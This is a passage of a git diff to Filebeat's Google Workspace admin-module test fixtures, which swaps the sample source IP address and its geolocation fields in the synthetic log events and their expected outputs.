         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -113,7 +105,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -125,26 +117,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 768,
+        "log.offset": 766,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -166,7 +154,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -185,26 +173,22 @@
         "group.domain": "example.com",
         "group.name": "group",
         "input.type": "log",
-        "log.offset": 1152,
+        "log.offset": 1149,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log
index 9c3bd721f397..cec0118eed77 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log
@@ -1,21 +1,21 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_DEVICE_STATE","parameters":[{"name":"DEVICE_NEW_STATE","value":"new"},{"name":"DEVICE_PREVIOUS_STATE","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_APPLICATION_SETTING","parameters":[{"name":"APP_ID","value":"2345"},{"name":"CHROME_OS_SESSION_TYPE","value":"type"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"SEND_CHROME_OS_DEVICE_COMMAND","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"},{"name":"NEW_VALUE","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_ANNOTATION","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"2345"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_DEVICE_STATE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_PUBLIC_SESSION_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINT_SERVER","parameters":[{"name":"PRINT_SERVER_NAME","value":"server"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"INSERT_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"DELETE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_CHROME_OS_PRINTER","parameters":[{"name":"PRINTER_NAME","value":"printer"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"DOMAIN_NAME","value":"example.com"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"CHANGE_CHROME_OS_USER_SETTING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"ISSUE_DEVICE_COMMAND","parameters":[{"name":"DEVICE_COMMAND_DETAILS","multiValue":["command","-a"]},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"MOVE_DEVICE_TO_ORG_UNIT_DETAILED","parameters":[{"name":"DEVICE_NEW_ORG_UNIT","value":"new"},{"name":"DEVICE_PREVIOUS_ORG_UNIT","value":"prev"},{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"REMOVE_CHROME_OS_APPLICATION_SETTINGS","parameters":[{"name":"APP_ID","value":"1234"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CHROME_OS_SETTINGS","name":"UPDATE_DEVICE","parameters":[{"name":"DEVICE_SERIAL_NUMBER","value":"1234"},{"name":"DEVICE_TYPE","value":"type"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json
index 4e3b1eac91d3..de8f9323bd7c 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-chromeos-test.json.log-expected.json
@@ -9,7 +9,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_ANDROID_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"2345\"},{\"name\":\"CHROME_OS_SESSION_TYPE\",\"value\":\"type\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
